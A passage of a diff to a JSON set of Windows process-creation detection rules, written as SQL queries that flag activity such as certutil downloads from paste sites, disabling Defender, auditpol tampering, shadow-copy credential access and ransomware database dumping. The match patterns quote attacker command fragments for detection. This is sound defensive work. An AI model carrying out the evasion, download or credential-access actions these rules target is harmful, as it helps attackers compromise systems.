Media Player\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" + "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" }, { - "title": "Tasks Folder Evasion", - "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "title": "New Port Forwarding Rule Added Via Netsh.EXX", + "id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", "status": "test", - "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", - "author": "Sreeman", + "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel", "tags": [ + "attack.lateral_movement", "attack.defense_evasion", - "attack.persistence", - "attack.execution", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity", + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%interface%' ESCAPE '\\' AND CommandLine LIKE '%portproxy%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%v4tov4%' ESCAPE '\\') OR (CommandLine LIKE '%i %' ESCAPE '\\' AND CommandLine LIKE '%p %' ESCAPE '\\' AND CommandLine LIKE '%a %' ESCAPE '\\' AND CommandLine LIKE '%v %' ESCAPE '\\') OR (CommandLine LIKE '%connectp%' ESCAPE '\\' AND CommandLine LIKE '%listena%' ESCAPE '\\' AND CommandLine LIKE '%c=%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_netsh_port_forwarding.yml" + }, + { + "title": "Audit Policy Tampering Via Auditpol", + "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "status": "test", + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "falsepositives": [ + "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_task_folder_evasion.yml" + "filename": "proc_creation_win_auditpol_susp_execution.yml" }, { - "title": "Sofacy Trojan Loader Activity", - "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "title": "Potential Commandline Obfuscation Using Escape Characters", + "id": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", "status": "test", - "description": "Detects Trojan loader activity as used by APT28", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects potential commandline obfuscation using known escape characters", + "author": "juju4", "tags": [ - "attack.g0007", - "attack.execution", - "attack.t1059.003", "attack.defense_evasion", - "car.2013-10-002", - "attack.t1218.011" + "attack.t1140" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%h^t^t^p%' ESCAPE '\\' OR CommandLine LIKE '%h\"t\"t\"p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_sofacy.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_escape_char.yml" }, { - "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", - "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "title": "PUA - Nimgrab Execution", + "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", "status": "experimental", - "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", + "author": "frack113", + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], "falsepositives": [ - "Unknown" + "Legitimate use of Nim on a developer systems" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" ], - "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" + "filename": "proc_creation_win_pua_nimgrab.yml" }, { - "title": "HackTool - Impersonate Execution", - "id": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", - "status": "experimental", - "description": "Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis", + "title": "Suspicious File Download Using Office Application", + "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "status": "test", + "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%impersonate.exe%' ESCAPE '\\' AND (CommandLine LIKE '% list %' ESCAPE '\\' OR CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% adduser %' ESCAPE '\\')) OR ((Hashes LIKE '%MD5=9520714AB576B0ED01D1513691377D01%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A358FFC1697B7A07D0E817AC740DF62%' ESCAPE '\\') OR md5 = '9520714AB576B0ED01D1513691377D01' OR sha256 = 'E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A' OR Imphash = '0A358FFC1697B7A07D0E817AC740DF62')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impersonate.yml" + "filename": "proc_creation_win_lolbin_office.yml" }, { - "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", - "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "title": "Potential Conti Ransomware Database Dumping Activity", + "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", "status": "test", - "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command used by conti to dump database", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Legitimate software creating script event consumers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" }, { - "title": "Potential Ke3chang/TidePool Malware Activity", - "id": "7b544661-69fc-419f-9a59-82ccc328f205", - "status": "test", - "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", - "author": "Markus Neis, Swisscom", + "title": "Disable Windows Defender AV Security Monitoring", + "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "status": "experimental", + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "author": "ok @securonix invrep-de, oscd.community, frack113", "tags": [ - "attack.g0004", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" + ], + "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" + }, + { + "title": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe", + "id": "65d2be45-8600-4042-b4c0-577a1ff8a60e", + "status": "test", + "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL", + "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218.008" + ], + "falsepositives": [ + "Legitimate use of odbcconf.exe by legitimate user" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR OriginalFileName = 'odbcconf.exe') AND (CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%-f%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%/f%' ESCAPE '\\' OR CommandLine LIKE '%regsvr%' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE'))))" ], - "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" + "filename": "proc_creation_win_odbcconf_susp_exec.yml" }, { - "title": "Suspicious CodePage Switch Via CHCP", - "id": "c7942406-33dd-4377-a564-0f62db0593a3", + "title": "Shadow Copies Creation Using Operating Systems Utilities", + "id": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", "status": "test", - "description": "Detects a code page switch in command line or batch scripts to a rare language", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Shadow Copies creation using operating systems utilities, possible credential access", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.t1036", - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Administrative activity (adjust code pages according to your organization's region)" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '% 936' ESCAPE '\\' OR CommandLine LIKE '% 1258' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_chcp_codepage_switch.yml" + "filename": "proc_creation_win_susp_shadow_copies_creation.yml" }, { - "title": "Potential NTLM Coercion Via Certutil.EXE", - "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", - "status": "experimental", - "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "LOLBIN Execution Of The FTP.EXE Binary", + "id": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "status": "test", + "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", + "author": "Victor Sergeev, oscd.community", "tags": [ + "attack.execution", + "attack.t1059", "attack.defense_evasion", - "attack.t1218" + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\' OR ((NewProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\' OR OriginalFileName = 'ftp.exe') AND CommandLine LIKE '%-s:%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certutil_ntlm_coercion.yml" + "filename": "proc_creation_win_lolbin_ftp.yml" }, { - "title": "HackTool - DInjector PowerShell Cradle Execution", - "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "title": "Rundll32 JS RunHTMLApplication Pattern", + "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", "status": "test", - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_dinjector.yml" + "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" }, { - "title": "Application Whitelisting Bypass via PresentationHost.exe", - "id": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", + "title": "Active Directory Structure Export Via Ldifde.EXE", + "id": "4f7a6757-ff79-46db-9687-66501a02d9ec", "status": "experimental", - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", + "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.exfiltration" ], "falsepositives": [ - "Legitimate \".xbap\" being executed via \"PresentationHost\"" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND CommandLine LIKE '%.xbap%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND CommandLine LIKE '%-f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_presentationhost.yml" + "filename": "proc_creation_win_ldifde_export.yml" }, { - "title": "Import PowerShell Modules From Suspicious Directories - ProcCreation", - "id": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", + "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", + "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", "status": "experimental", - "description": "Detects powershell scripts that import modules from suspicious directories", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_import_module_susp_dirs.yml" + "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" }, { - "title": "OilRig APT Activity", - "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", - "status": "test", - "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Active Directory Structure Export Via Csvde.EXE", + "id": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", + "status": "experimental", + "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.exfiltration" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\csvde.exe' ESCAPE '\\' OR OriginalFileName = 'csvde.exe') AND CommandLine LIKE '% -f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_oilrig_mar18.yml" + "filename": "proc_creation_win_csvde_export.yml" }, { - "title": "Potential SMB Relay Attack Tool Execution", - "id": "5589ab4f-a767-433c-961d-c91f3f704db1", + "title": "Pingback Backdoor Activity", + "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", "status": "test", - "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Legitimate files with these rare hacktool names" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName 